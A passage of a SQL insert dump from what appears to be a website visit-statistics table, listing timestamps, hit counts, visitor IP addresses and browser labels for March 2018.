me'),(223481,1521626993,1,1,0,0,'54.36.148.160','other'),(223482,1521627145,1,1,0,0,'54.36.148.114','other'),(223483,1521627426,1,1,0,0,'141.8.142.74','other'),(223484,1521627509,1,1,0,0,'54.36.148.131','other'),(223485,1521627575,1,1,0,0,'91.196.178.91','chrome'),(223486,1521627586,1,1,0,0,'54.36.149.102','other'),(223487,1521627698,1,1,0,0,'54.210.107.179','other'),(223488,1521628375,1,1,0,0,'54.36.148.31','other'),(223489,1521628595,1,1,0,0,'54.36.148.188','other'),(223490,1521628641,1,1,0,0,'8.29.198.27','other'),(223491,1521628679,1,1,0,0,'54.36.149.56','other'),(223492,1521628686,1,1,0,0,'54.36.149.106','other'),(223493,1521628808,47,47,0,0,'158.69.252.176','other'),(223494,1521628842,1,1,0,0,'95.135.237.213','chrome'),(223495,1521629176,1,1,0,0,'54.210.107.179','other'),(223496,1521629189,2,2,0,0,'141.8.142.74','other'),(223497,1521629241,2,2,0,0,'91.196.178.134','chrome'),(223498,1521629272,1,0,1,0,'66.249.66.195',''),(223499,1521629416,1,1,0,0,'216.244.66.237','other'),(223500,1521629938,1,1,0,0,'54.36.149.62','other'),(223501,1521629968,1,1,0,0,'54.36.148.219','other'),(223502,1521630161,1,1,0,0,'77.111.244.42','chrome'),(223503,1521630208,1,1,0,0,'54.36.149.30','other'),(223504,1521630431,1,0,1,0,'66.249.66.199',''),(223505,1521630612,1,1,0,0,'54.210.107.179','other'),(223506,1521630662,1,1,0,0,'54.36.148.149','other'),(223507,1521630670,1,1,0,0,'188.230.43.254','other'),(223508,1521631028,2,2,0,0,'216.244.66.237','other'),(223509,1521631281,1,1,0,0,'141.8.142.74','other'),(223510,1521631413,1,1,0,0,'54.36.148.87','other'),(223511,1521631449,1,0,1,0,'66.249.66.157',''),(223512,1521631553,1,1,0,0,'178.154.171.88','other'),(223513,1521631561,1,1,0,0,'94.154.39.106','chrome'),(223514,1521631563,1,1,0,0,'95.132.44.95','chrome'),(223515,1521631945,1,1,0,0,'54.36.148.222','other'),(223516,1521631999,1,1,0,0,'95.135.91.153','chrome'),(223517,1521632049,1,1,0,0,'54.210.107.179','other'),(223518,1521632163,1,1,0,0,'107.178.195.152','msie'),(223519,1521632285,1,0,1,0,'66.249.66.195',''),(223520,1521632301,1,1,0,0,'54.36.148.117','other'),(223521,1521632452,1,1,0,0,'130.180.218.201','chrome'),(223522,1521632487,1,1,0,0,'52.200.221.20','msie'),(223523,1521632507,1,1,0,0,'50.112.194.65','msie'),(223524,1521632576,1,1,0,0,'54.36.148.151','other'),(223525,1521632692,2,2,0,0,'91.196.178.162','chrome'),(223526,1521632766,1,1,0,0,'54.36.149.53','other'),(223527,1521632900,2,2,0,0,'35.226.23.240','other'),(223528,1521632994,1,1,0,0,'54.36.148.217','other'),(223529,1521633078,2,2,0,0,'93.170.115.254','chrome'),(223530,1521633095,1,1,0,0,'188.230.43.254','other'),(223531,1521633099,1,1,0,0,'66.249.66.195','chrome'),(223532,1521633516,1,1,0,0,'54.210.107.179','other'),(223533,1521633525,1,1,0,0,'54.36.149.33','other'),(223534,1521633843,1,1,0,0,'54.36.148.50','other'),(223535,1521634712,1,1,0,0,'118.219.252.196','other'),(223536,1521635013,1,1,0,0,'54.210.107.179','other'),(223537,1521635089,1,1,0,0,'54.36.148.129','other'),(223538,1521635216,1,1,0,0,'54.36.148.22','other'),(223539,1521635337,1,1,0,0,'54.36.149.12','other'),(223540,1521635415,2,0,2,0,'66.249.66.195',''),(223541,1521635474,1,1,0,0,'188.230.43.254','other'),(223542,1521635699,3,3,0,0,'216.244.66.237','other'),(223543,1521635785,1,1,0,0,'77.111.244.48','chrome'),(223544,1521636118,1,1,0,0,'66.249.66.201','chrome'),(223545,1521636168,1,1,0,0,'54.36.148.206','other'),(223546,1521636172,1,1,0,0,'207.46.13.7','other'),(223547,1521636187,1,1,0,0,'141.8.142.74','other'),(223548,1521636322,2,2,0,0,'91.196.178.94','chrome'),(223549,1521636356,2,2,0,0,'91.196.178.12','chrome'),(223550,1521636386,1,1,0,0,'178.154.171.88','other'),(223551,1521636614,1,1,0,0,'54.210.107.179','other'),(223552,1521636895,1,1,0,0,'95.134.97.244','chrome'),(223553,1521637148,1,1,0,0,'37.55.145.10','chrome'),(223554,1521637341,1,1,0,0,'54.36.149.79','other'),(223555,1521637501,1,1,0,0,'54.36.149.13','other'),(223556,1521637994,1,1,0,0,'54.210.107.179','other'),(223557,1521638282,1,1,0,0,'54.36.148.149','other'),(223558,1521638692,1,1,0,0,'54.36.148.154','other'),(223559,1521638884,1,0,1,0,'66.249.66.201',''),(223560,1521639011,2,2,0,0,'91.196.178.94','chrome'),(223561,1521639051,1,1,0,0,'54.36.149.43','other'),(223562,1521639164,1,1,0,0,'91.225.4.14','chrome'),(223563,1521639175,4,4,0,0,'141.8.142.74','other'),(223564,1521639471,1,1,0,0,'8.29.198.25','other'),(223565,1521639599,1,1,0,0,'54.36.148.200','other'),(223566,1521639903,1,1,0,0,'35.226.23.240','other'),(223567,1521640117,1,1,0,0,'217.69.133.70','other'),(223568,1521640541,1,1,0,0,'54.36.148.125','other'),(223569,1521640966,1,1,0,0,'54.210.107.179','other'),(223570,1521641056,1,1,0,0,'54.36.148.106','other'),(223571,1521641074,1,1,0,0,'91.196.178.91','chrome'),(223572,1521641131,1,0,1,0,'66.249.66.195',''),(223573,1521641225,1,1,0,0,'54.36.149.61','other'),(223574,1521641584,1,1,0,0,'178.154.171.88','other'),(223575,1521641865,1,1,0,0,'130.180.211.142','firefox'),(223576,1521642029,1,1,0,0,'216.244.66.237','other'),(223577,1521642169,1,1,0,0,'54.36.148.98','other'),(223578,1521642242,1,1,0,0,'141.8.142.74','other'),(223579,1521642518,1,1,0,0,'54.210.107.179','other'),(223580,1521642616,1,1,0,0,'54.36.148.227','other'),(223581,1521642738,1,1,0,0,'54.36.148.130','other'),(223582,1521642804,1,1,0,0,'54.36.149.44','other'),(223583,1521642825,1,1,0,0,'54.36.148.129','other'),(223584,1521643066,1,1,0,0,'54.36.149.63','other'),(223585,1521643331,1,1,0,0,'91.196.177.46','chrome'),(223586,1521643335,1,1,0,0,'54.36.149.88','other'),(223587,1521643385,1,1,0,0,'54.36.148.118','other'),(223588,1521643496,2,2,0,0,'216.244.66.237','other'),(223589,1521644027,1,1,0,0,'54.210.107.179','other'),(223590,1521644084,1,1,0,0,'37.9.113.182','other'),(223591,1521644108,1,1,0,0,'54.36.149.105','other'),(223592,1521644158,1,1,0,0,'54.36.148.25','other'),(223593,1521644190,3,3,0,0,'91.196.178.27','chrome'),(223594,1521644263,1,1,0,0,'54.36.149.94','other'),(223595,1521644355,1,1,0,0,'54.91.126.62','chrome'),(223596,1521644398,1,1,0,0,'54.36.148.145','other'),(223597,1521644441,1,1,0,0,'54.36.148.194','other'),(223598,1521644593,1,1,0,0,'62.205.134.182','msie'),(223599,1521644729,1,1,0,0,'54.36.148.175','other'),(223600,1521644746,2,2,0,0,'91.196.178.94','chrome'),(223601,1521644891,1,1,0,0,'80.252.154.233','chrome'),(223602,1521645012,1,1,0,0,'54.36.149.89','other'),(223603,1521645220,2,2,0,0,'216.244.66.237','other'),(223604,1521645487,1,1,0,0,'54.210.107.179','other'),(223605,1521645510,1,1,0,0,'188.230.43.254','other'),(223606,1521645528,1,1,0,0,'54.36.149.11','other'),(223607,1521645890,1,1,0,0,'213.108.45.138','chrome'),(223608,1521646040,1,1,0,0,'54.36.148.244','other'),(223609,1521646165,1,1,0,0,'141.8.142.74','other'),(223610,1521646276,1,1,0,0,'54.36.149.107','other'),(223611,1521646507,1,1,0,0,'54.36.149.25','other'),(223612,1521646665,1,1,0,0,'54.36.148.204','other'),(223613,1521646807,1,1,0,0,'91.196.179.138','firefox'),(223614,1521646815,1,1,0,0,'91.196.179.138','chrome'),(223615,1521646820,1,1,0,0,'216.244.66.237','other'),(223616,1521646958,1,1,0,0,'54.210.107.179','other'),(223617,1521647461,1,1,0,0,'91.196.178.86','firefox'),(223618,1521647529,1,1,0,0,'54.36.149.2','other'),(223619,1521647569,1,0,1,0,'66.249.66.199',''),(223620,1521647681,3,3,0,0,'195.201.33.105','other'),(223621,1521647907,1,1,0,0,'188.230.43.254','other'),(223622,1521647943,2,2,0,0,'141.8.142.74','other'),(223623,1521647954,1,1,0,0,'54.36.149.58','other'),(223624,1521648097,1,1,0,0,'54.36.148.111','other'),(223625,1521648256,1,1,0,0,'91.196.178.100','chrome'),(223626,1521648353,1,1,0,0,'216.244.66.237','other'),(223627,1521648375,1,1,0,0,'54.210.107.179','other'),(223628,1521648636,1,1,0,0,'54.36.148.75','other'),(223629,1521648924,1,1,0,0,'157.55.39.218','other'),(223630,1521648989,1,1,0,0,'54.36.148.229','other'),(223631,1521649233,1,1,0,0,'178.154.171.88','other'),(223632,1521649611,1,1,0,0,'54.36.148.13','other'),(223633,1521649855,1,1,0,0,'54.210.107.179','other'),(223634,1521650253,1,1,0,0,'54.36.149.19','other'),(223635,1521650304,1,1,0,0,'8.29.198.25','other'),(223636,1521650357,1,1,0,0,'188.230.43.254','other'),(223637,1521650361,1,1,0,0,'54.36.148.33','other'),(223638,1521650590,1,1,0,0,'54.36.148.72','other'),(223639,1521650720,3,3,0,0,'92.113.174.6','chrome'),(223640,1521650760,1,1,0,0,'54.36.149.71','other'),(223641,1521650840,1,1,0,0,'54.36.149.43','other'),(223642,1521650882,1,1,0,0,'54.36.148.10','other'),(223643,1521650990,1,1,0,0,'54.36.149.55','other'),(223644,1521651361,1,1,0,0,'54.36.148.110','other'),(223645,1521651363,1,1,0,0,'54.36.148.117','other'),(223646,1521651373,1,1,0,0,'54.210.107.179','other'),(223647,1521651480,1,1,0,0,'54.36.149.46','other'),(223648,1521651600,1,1,0,0,'54.36.148.19','other'),(223649,1521651773,1,1,0,0,'54.36.148.93','other'),(223650,1521651814,1,1,0,0,'54.36.148.251','other'),(223651,1521651833,1,1,0,0,'54.36.148.78','other'),(223652,1521651904,1,1,0,0,'54.36.148.102','other'),(223653,1521652223,1,1,0,0,'54.36.148.140','other'),(223654,1521652751,1,0,1,0,'66.249.66.199',''),(223655,1521652835,1,1,0,0,'54.210.107.179','other'),(223656,1521652995,1,1,0,0,'216.244.66.237','other'),(223657,1521653416,1,1,0,0,'91.196.177.46','chrome'),(223658,1521653612,1,1,0,0,'157.55.39.218','other'),(223659,1521653638,1,1,0,0,'54.36.148.220','other'),(223660,1521653770,1,1,0,0,'54.36.149.104','other'),(223661,1521653905,2,2,0,0,'91.196.178.45','chrome'),(223662,1521654792,1,1,0,0,'54.36.148.80','other'),(223663,1521654811,1,1,0,0,'54.36.148.73','other'),(223664,1521654893,1,1,0,0,'66.102.9.40','chrome'),(223665,1521654990,1,1,0,0,'66.102.9.35','chrome'),(223666,1521655215,1,0,1,0,'66.249.66.195',''),(223667,1521655419,1,1,0,0,'54.36.148.170','other'),(223668,1521655564,1,1,0,0,'54.36.148.111','other'),(223669,1521655658,1,1,0,0,'54.36.149.0','other'),(223670,1521655745,1,1,0,0,'54.36.148.97','other'),(223671,1521655780,1,1,0,0,'54.36.148.53','other'),(223672,1521655877,1,1,0,0,'54.210.107.179','other'),(223673,1521656173,1,1,0,0,'54.36.149.6','other'),(223674,1521656185,2,2,0,0,'91.196.178.12','chrome'),(223675,1521656312,1,1,0,0,'54.36.149.39','other'),(223676,1521656389,2,2,0,0,'92.113.174.6','chrome'),(223677,1521656404,2,2,0,0,'178.154.171.88','other'),(223678,1521656677,1,1,0,0,'54.36.148.83','other'),(223679,1521656883,2,2,0,0,'141.8.142.74','other'),(223680,1521657353,1,1,0,0,'54.36.148.46','other'),(223681,1521657391,1,1,0,0,'54.210.107.179','other'),(223682,1521657713,1,1,0,0,'54.36.148.105','other'),(223683,1521657812,1,1,0,0,'66.249.66.201','chrome'),(223684,1521658108,1,1,0,0,'54.36.148.78','other'),(223685,1521658276,1,1,0,0,'54.36.148.28','other'),(223686,1521658507,1,1,0,0,'178.154.171.88','other'),(223687,1521658626,3,3,0,0,'54.165.59.7','other'),(223688,1521658724,1,1,0,0,'54.36.148.173','other'),(223689,1521658741,1,1,0,0,'54.36.149.5','other'),(223690,1521658816,1,1,0,0,'54.36.149.47','other'),(223691,1521658906,1,1,0,0,'54.210.107.179','other'),(223692,1521659145,1,1,0,0,'54.36.148.70','other'),(223693,1521659403,1,1,0,0,'91.196.178.86','firefox'),(223694,1521659435,1,1,0,0,'54.36.148.249','other'),(223695,1521659755,1,1,0,0,'87.250.224.46','other'),(223696,1521660302,1,1,0,0,'54.36.148.225','other'),(223697,1521660354,1,1,0,0,'54.36.148.181','other'),(223698,1521660358,1,1,0,0,'54.210.107.179','other'),(223699,1521660533,1,1,0,0,'37.9.113.182','other'),(223700,1521660538,1,1,0,0,'54.36.148.139','other'),(223701,1521661021,1,1,0,0,'91.196.178.61','chrome'),(223702,1521661048,1,1,0,0,'194.44.129.214','chrome'),(223703,1521661078,1,1,0,0,'87.250.224.46','other'),(223704,1521661144,1,1,0,0,'8.29.198.25','other'),(223705,1521661176,1,0,1,0,'66.249.66.201',''),(223706,1521661408,1,1,0,0,'54.36.148.177','other'),(223707,1521661419,1,1,0,0,'54.36.149.93','other'),(223708,1521661717,1,1,0,0,'207.46.13.9','other'),(223709,1521661742,1,1,0,0,'54.36.148.112','other'),(223710,1521661787,1,1,0,0,'54.36.148.120','other'),(223711,1521661816,2,2,0,0,'54.36.148.20','other'),(223712,1521661824,1,1,0,0,'54.210.107.179','other'),(223713,1521661870,1,1,0,0,'54.36.148.98','other'),(223714,1521662178,1,1,0,0,'54.36.148.89','other'),(223715,1521662321,1,1,0,0,'54.36.148.145','other'),(223716,1521662398,1,0,1,0,'66.249.66.195',''),(223717,1521662445,1,1,0,0,'178.255.215.94','other'),(223718,1521662475,1,1,0,0,'54.36.149.104','other'),(223719,1521662816,2,2,0,0,'91.196.178.83','chrome'),(223720,1521662987,1,1,0,0,'54.36.148.107','other'),(223721,1521663133,1,1,0,0,'54.36.148.55','other'),(223722,1521663148,1,1,0,0,'54.36.149.106','other'),(223723,1521663173,1,1,0,0,'54.36.148.220','other'),(223724,1521663265,1,1,0,0,'194.165.46.38','chrome'),(223725,1521663280,1,1,0,0,'54.210.107.179','other'),(223726,1521663525,1,1,0,0,'54.36.148.85','other'),(223727,1521664317,1,1,0,0,'178.154.171.88','other'),(223728,1521664474,1,1,0,0,'54.36.149.41','other'),(223729,1521664748,1,1,0,0,'54.210.107.179','other'),(223730,1521665055,1,1,0,0,'54.36.149.83','other'),(223731,1521665907,1,1,0,0,'54.36.149.50','other'),(223732,1521665981,1,1,0,0,'54.36.148.139','other'),(223733,1521665992,1,1,0,0,'54.36.149.86','other'),(223734,1521666252,1,1,0,0,'66.249.66.201','chrome'),(223735,1521666349,1,1,0,0,'54.210.107.179','other'),(223736,1521666579,1,1,0,0,'185.105.119.68','firefox'),(223737,1521666673,1,1,0,0,'54.36.149.70','other'),(223738,1521666680,1,1,0,0,'66.249.66.157','chrome'),(223739,1521666925,1,1,0,0,'54.36.148.214','other'),(223740,1521667003,1,1,0,0,'54.36.148.118','other'),(223741,1521667089,1,1,0,0,'54.36.148.111','other'),(223742,1521667139,1,1,0,0,'54.36.148.178','other'),(223743,1521667177,1,1,0,0,'54.36.148.190','other'),(223744,1521667449,1,1,0,0,'54.36.148.191','other'),(223745,1521667800,1,1,0,0,'54.210.107.179','other'),(223746,1521667968,1,1,0,0,'54.36.148.123','other'),(223747,1521667986,1,1,0,0,'54.36.148.118','other'),(223748,1521668535,1,1,0,0,'66.249.66.201','chrome'),(223749,1521668772,1,1,0,0,'54.36.149.35','other'),(223750,1521669103,1,1,0,0,'54.36.148.110','other'),(223751,1521669130,1,1,0,0,'54.36.149.90','other'),(223752,1521669388,1,1,0,0,'92.113.191.131','chrome'),(223753,1521669472,1,1,0,0,'54.36.148.167','other'),(223754,1521669481,1,0,1,0,'66.249.66.157',''),(223755,1521669959,1,1,0,0,'194.187.170.148','other'),(223756,1521670149,1,0,1,0,'66.249.66.199',''),(223757,1521670150,1,1,0,0,'54.36.148.174','other'),(223758,1521670333,1,1,0,0,'54.36.148.244','other'),(223759,1521670403,1,1,0,0,'54.36.149.1','other'),(223760,1521670441,1,1,0,0,'54.36.148.204','other'),(223761,1521670524,1,1,0,0,'54.36.148.11','other'),(223762,1521670702,1,1,0,0,'54.36.148.233','other'),(223763,1521670741,1,1,0,0,'54.210.107.179','other'),(223764,1521670854,1,1,0,0,'54.36.148.50','other'),(223765,1521670910,1,1,0,0,'54.36.148.90','other'),(223766,1521670914,1,1,0,0,'54.36.149.18','other'),(223767,1521671304,1,1,0,0,'216.244.66.246','other'),(223768,1521671586,1,1,0,0,'54.36.149.54','other'),(223769,1521671912,1,1,0,0,'54.36.148.42','other'),(223770,1521671988,1,1,0,0,'54.36.148.210','other'),(223771,1521671995,1,1,0,0,'8.29.198.25','other'),(223772,1521672229,1,1,0,0,'54.210.107.179','other'),(223773,1521672533,1,1,0,0,'54.36.148.103','other'),(223774,1521673056,1,1,0,0,'54.36.148.246','other'),(223775,1521673082,1,1,0,0,'54.36.148.225','other'),(223776,1521673300,1,1,0,0,'54.36.149.68','other'),(223777,1521673474,1,1,0,0,'54.36.148.15','other'),(223778,1521673523,1,1,0,0,'54.36.148.29','other'),(223779,1521673640,1,1,0,0,'54.36.148.236','other'),(223780,1521673677,1,1,0,0,'54.210.107.179','other'),(223781,1521673747,1,1,0,0,'54.36.149.69','other'),(223782,1521674069,1,1,0,0,'216.244.66.237','other'),(223783,1521674205,1,1,0,0,'54.36.148.172','other'),(223784,1521674986,1,1,0,0,'54.36.148.254','other'),(223785,1521674996,1,1,0,0,'54.36.149.53','other'),(223786,1521675038,1,1,0,0,'54.210.107.179','other'),(223787,1521675695,1,0,1,0,'66.249.66.157',''),(223788,1521675745,1,1,0,0,'54.36.148.235','other'),(223789,1521675849,1,1,0,0,'54.36.149.75','other'),(223790,1521676209,1,1,0,0,'54.36.149.36','other'),(223791,1521676219,1,1,0,0,'54.36.148.124','other'),(223792,1521676458,1,1,0,0,'54.215.57.23','chrome'),(223793,1521676486,1,1,0,0,'54.210.107.179','other'),(223794,1521676669,1,1,0,0,'54.36.149.17','other'),(223795,1521676696,1,1,0,0,'54.36.148.196','other'),(223796,1521676721,1,1,0,0,'54.36.148.206','other'),(223797,1521676868,1,1,0,0,'54.36.148.132','other'),(223798,1521677088,1,1,0,0,'54.36.148.231','other'),(223799,1521677837,1,1,0,0,'216.244.66.237','other'),(223800,1521677936,1,1,0,0,'54.210.107.179','other'),(223801,1521677940,1,1,0,0,'54.36.148.120','other'),(223802,1521678358,1,1,0,0,'54.36.148.231','other'),(223803,1521678885,1,1,0,0,'54.36.149.107','other'),(223804,1521678967,1,1,0,0,'87.250.224.46','other'),(223805,1521679450,1,1,0,0,'54.210.107.179','other'),(223806,1521679540,1,1,0,0,'54.36.148.199','other'),(223807,1521680136,1,1,0,0,'54.36.149.98','other'),(223808,1521680544,1,1,0,0,'54.36.148.136','other'),(223809,1521680555,1,1,0,0,'54.36.148.43','other'),(223810,1521680898,1,1,0,0,'54.36.149.55','other'),(223811,1521680924,1,1,0,0,'54.210.107.179','other'),(223812,1521681545,1,1,0,0,'54.36.148.123','other'),(223813,1521682044,1,1,0,0,'95.67.223.169','firefox'),(223814,1521682377,1,1,0,0,'54.210.107.179','other'),(223815,1521682859,1,1,0,0,'8.29.198.25','other'),(223816,1521683650,1,1,0,0,'54.36.148.73','other'),(223817,1521683982,1,1,0,0,'54.36.148.217','other'),(223818,1521684155,1,1,0,0,'54.36.148.139','other'),(223819,1521684403,1,1,0,0,'54.36.149.12','other'),(223820,1521684615,1,1,0,0,'54.36.148.244','other'),(223821,1521684751,1,1,0,0,'54.36.148.159','other'),(223822,1521685126,1,1,0,0,'54.36.149.76','other'),(223823,1521685127,1,1,0,0,'54.36.148.206','other'),(223824,1521685299,1,1,0,0,'87.250.224.77','other'),(223825,1521685405,1,1,0,0,'54.210.107.179','other'),(223826,1521685862,1,1,0,0,'54.36.148.240','other'),(223827,1521686002,1,1,0,0,'54.36.148.190','other'),(223828,1521686251,1,1,0,0,'54.36.148.236','other'),(223829,1521686329,1,1,0,0,'54.36.148.53','other'),(223830,1521686354,1,1,0,0,'54.36.148.221','other'),(223831,1521686399,1,1,0,0,'54.36.149.9','other'),(223832,1521686422,1,0,1,0,'66.249.66.199',''),(223833,1521686542,1,1,0,0,'54.36.149.85','other'),(223834,1521687107,1,1,0,0,'54.210.107.179','other'),(223835,1521687235,1,1,0,0,'141.8.142.167','other'),(223836,1521687482,1,1,0,0,'54.36.148.18','other'),(223837,1521688334,1,1,0,0,'54.36.148.91','other'),(223838,1521688480,1,1,0,0,'54.210.107.179','other'),(223839,1521688584,1,1,0,0,'54.36.149.103','other'),(223840,1521688693,1,1,0,0,'54.36.148.184','other'),(223841,1521688727,1,1,0,0,'54.36.148.15','other'),(223842,1521688811,1,1,0,0,'54.36.148.53','other'),(223843,1521689419,2,2,0,0,'216.244.66.237','other'),(223844,1521689444,1,1,0,0,'54.36.148.131','other'),(223845,1521689495,1,1,0,0,'178.154.200.8','other'),(223846,1521689678,1,1,0,0,'54.36.148.98','other'),(223847,1521689715,1,1,0,0,'54.36.148.216','other'),(223848,1521689862,1,1,0,0,'54.36.149.76','other'),(223849,1521689902,1,1,0,0,'54.36.148.161','other'),(223850,1521689923,1,1,0,0,'54.210.107.179','other'),(223851,1521690159,1,1,0,0,'54.36.149.79','other'),(223852,1521690422,1,1,0,0,'54.36.148.129','other'),(223853,1521690920,1,1,0,0,'37.9.113.60','other'),(223854,1521690924,1,1,0,0,'141.8.142.74','other'),(223855,1521690949,2,2,0,0,'216.244.66.246','other'),(223856,1521691438,1,1,0,0,'54.210.107.179','other'),(223857,1521691616,1,1,0,0,'54.36.148.243','other'),(223858,1521692023,1,1,0,0,'54.36.148.83','other'),(223859,1521692215,1,1,0,0,'54.36.148.98','other'),(223860,1521692216,1,1,0,0,'66.249.66.201','chrome'),(223861,1521692287,1,1,0,0,'54.36.148.140','other'),(223862,1521692414,1,1,0,0,'66.249.66.199','chrome'),(223863,1521692855,1,1,0,0,'54.210.107.179','other'),(223864,1521692856,1,1,0,0,'54.36.149.1','other'),(223865,1521692863,1,1,0,0,'54.36.148.251','other'),(223866,1521693159,5,5,0,0,'158.69.251.119','other'),(223867,1521693190,1,1,0,0,'54.36.148.68','other'),(223868,1521693669,1,1,0,0,'54.36.148.97','other'),(223869,1521693694,1,1,0,0,'8.29.198.25','other'),(223870,1521693711,1,1,0,0,'54.36.149.79','other'),(223871,1521693740,1,1,0,0,'141.8.142.74','other'),(223872,1521694039,1,1,0,0,'54.36.149.76','other'),(223873,1521694249,2,2,0,0,'216.244.66.237','other'),(223874,1521694359,1,1,0,0,'54.210.107.179','other'),(223875,1521694751,1,1,0,0,'54.36.149.102','other'),(223876,1521695108,1,1,0,0,'54.36.148.153','other'),(223877,1521695118,1,1,0,0,'54.36.148.120','other'),(223878,1521695320,1,1,0,0,'54.36.148.131','other'),(223879,1521695467,1,1,0,0,'87.250.224.46','other'),(223880,1521695552,1,1,0,0,'54.36.148.77','other'),(223881,1521695592,1,1,0,0,'54.36.148.192','other'),(223882,1521695828,1,1,0,0,'54.210.107.179','other'),(223883,1521695909,1,1,0,0,'54.36.148.111','other'),(223884,1521696304,1,1,0,0,'54.36.149.52','other'),(223885,1521696521,1,1,0,0,'54.36.148.98','other'),(223886,1521696659,1,1,0,0,'54.36.148.129','other'),(223887,1521696779,1,1,0,0,'54.36.148.124','other'),(223888,1521696854,1,1,0,0,'54.36.149.22','other'),(223889,1521697337,1,1,0,0,'54.210.107.179','other'),(223890,1521697676,1,1,0,0,'54.36.148.160','other'),(223891,1521697859,1,1,0,0,'178.154.171.88','other'),(223892,1521698083,1,1,0,0,'54.36.148.161','other'),(223893,1521698085,1,1,0,0,'54.36.149.81','other'),(223894,1521698214,1,1,0,0,'54.36.149.75','other'),(223895,1521698235,1,1,0,0,'54.36.148.114','other'),(223896,1521698737,1,1,0,0,'216.244.66.237','other'),(223897,1521698738,1,1,0,0,'54.36.148.44','other'),(223898,1521699094,2,2,0,0,'130.180.219.231','chrome'),(223899,1521699311,2,2,0,0,'77.111.244.32','chrome'),(223900,1521699510,2,2,0,0,'91.196.178.74','chrome'),(223901,1521699758,1,1,0,0,'216.244.66.237','other'),(223902,1521699827,1,1,0,0,'54.36.148.13','other'),(223903,1521699912,1,0,1,0,'66.249.66.201',''),(223904,1521699942,1,1,0,0,'92.113.182.138','chrome'),(223905,1521699971,1,1,0,0,'54.36.148.69','other'),(223906,1521700200,1,1,0,0,'54.36.148.115','other'),(223907,1521700336,1,1,0,0,'54.210.107.179','other'),(223908,1521700357,1,1,0,0,'54.36.148.96','other'),(223909,1521700549,1,1,0,0,'54.36.149.11','other'),(223910,1521700667,1,1,0,0,'95.134.97.244','chrome'),(223911,1521700730,1,1,0,0,'54.36.149.57','other'),(223912,1521701150,2,2,0,0,'91.196.177.46','chrome'),(223913,1521701171,1,1,0,0,'54.36.148.230','other'),(223914,1521701254,1,1,0,0,'54.36.148.72','other'),(223915,1521701274,1,1,0,0,'141.8.142.74','other'),(223916,1521701434,1,1,0,0,'54.36.148.252','other'),(223917,1521701530,1,1,0,0,'54.36.148.188','other'),(223918,1521701874,1,1,0,0,'54.210.107.179','other'),(223919,1521702072,1,1,0,0,'54.36.148.111','other'),(223920,1521702164,1,1,0,0,'54.36.148.185','other'),(223921,1521702458,1,1,0,0,'188.230.43.254','other'),(223922,1521702602,1,1,0,0,'91.196.177.110','chrome'),(223923,1521702605,2,2,0,0,'54.36.149.5','other'),(223924,1521702689,1,1,0,0,'91.196.178.73','firefox'),(223925,1521702878,1,1,0,0,'54.36.148.32','other'),(223926,1521703067,1,1,0,0,'54.36.148.64','other'),(223927,1521703202,6,6,0,0,'91.196.177.15','chrome'),(223928,1521703324,1,1,0,0,'54.210.107.179','other'),(223929,1521703425,1,1,0,0,'54.36.148.48','other'),(223930,1521703742,1,1,0,0,'54.36.148.52','other'),(223931,1521703760,1,1,0,0,'37.9.113.151','other'),(223932,1521703871,1,1,0,0,'54.36.148.34','other'),(223933,1521703897,1,1,0,0,'91.196.178.164','firefox'),(223934,1521703958,1,1,0,0,'54.36.148.66','other'),(223935,1521704169,1,1,0,0,'54.36.148.118','other'),(223936,1521704433,1,1,0,0,'54.36.148.222','other'),(223937,1521704505,1,1,0,0,'35.226.23.240','other'),(223938,1521704519,1,1,0,0,'8.29.198.27','other'),(223939,1521704644,1,1,0,0,'54.36.148.63','other'),(223940,1521704817,1,1,0,0,'54.210.107.179','other'),(223941,1521704874,1,1,0,0,'54.36.148.89','other'),(223942,1521704901,1,1,0,0,'95.134.97.31','chrome'),(223943,1521704993,1,1,0,0,'54.36.149.41','other'),(223944,1521705580,1,1,0,0,'46.200.125.94','chrome'),(223945,1521705791,1,1,0,0,'54.36.148.191','other'),(223946,1521705826,2,2,0,0,'91.196.178.22','chrome'),(223947,1521705970,1,1,0,0,'54.36.149.11','other'),(223948,1521705995,2,2,0,0,'195.230.119.59','chrome'),(223949,1521706063,1,1,0,0,'54.36.149.71','other'),(223950,1521706218,1,1,0,0,'54.210.107.179','other'),(223951,1521706251,5,5,0,0,'82.207.22.86','chrome'),(223952,1521706257,1,1,0,0,'54.36.149.27','other'),(223953,1521706404,1,1,0,0,'92.112.125.243','chrome'),(223954,1521706460,1,1,0,0,'54.36.148.160','other'),(223955,1521706556,1,1,0,0,'54.36.148.118','other'),(223956,1521706630,1,1,0,0,'194.54.160.8','chrome'),(223957,1521706726,1,1,0,0,'141.8.142.74','other'),(223958,1521706804,1,1,0,0,'54.36.148.210','other'),(223959,1521706824,4,4,0,0,'91.196.178.77','chrome'),(223960,1521706899,1,1,0,0,'178.154.171.88','other'),(223961,1521706916,1,1,0,0,'54.36.148.91','other'),(223962,1521707265,1,1,0,0,'54.36.149.68','other'),(223963,1521707560,1,1,0,0,'54.36.149.22','other'),(223964,1521707646,1,1,0,0,'54.210.107.179','other'),(223965,1521707718,1,1,0,0,'54.36.148.210','other'),(223966,1521707731,1,1,0,0,'54.36.148.206','other'),(223967,1521707803,2,2,0,0,'91.196.178.77','chrome'),(223968,1521707824,1,1,0,0,'54.36.149.21','other'),(223969,1521707985,1,1,0,0,'54.36.149.53','other'),(223970,1521708166,1,1,0,0,'54.36.148.136','other'),(223971,1521708211,1,1,0,0,'178.154.171.88','other'),(223972,1521708490,1,1,0,0,'54.36.149.4','other'),(223973,1521708565,1,1,0,0,'54.36.149.5','other'),(223974,1521709160,1,1,0,0,'54.210.107.179','other'),(223975,1521709199,1,1,0,0,'54.36.148.186','other'),(223976,1521709596,1,1,0,0,'54.36.148.224','other'),(223977,1521709768,1,1,0,0,'216.244.66.237','other'),(223978,1521709784,4,4,0,0,'91.196.179.33','chrome'),(223979,1521709848,1,1,0,0,'104.45.18.178','other'),(223980,1521709856,2,2,0,0,'62.80.185.138','other'),(223981,1521710028,2,2,0,0,'91.196.178.169','chrome'),(223982,1521710096,1,1,0,0,'54.36.149.63','other'),(223983,1521710238,1,1,0,0,'91.209.11.236','other'),(223984,1521710348,1,1,0,0,'91.196.178.73','firefox'),(223985,1521710376,1,1,0,0,'54.36.148.45','other'),(223986,1521710426,1,1,0,0,'54.36.149.42','other'),(223987,1521710475,1,1,0,0,'54.36.149.101','other'),(223988,1521710492,3,3,0,0,'91.196.178.77','chrome'),(223989,1521710567,1,1,0,0,'54.36.148.137','other'),(223990,1521710670,1,1,0,0,'54.210.107.179','other'),(223991,1521710703,6,6,0,0,'91.196.179.33','chrome'),(223992,1521710764,1,1,0,0,'54.36.149.4','other'),(223993,1521710927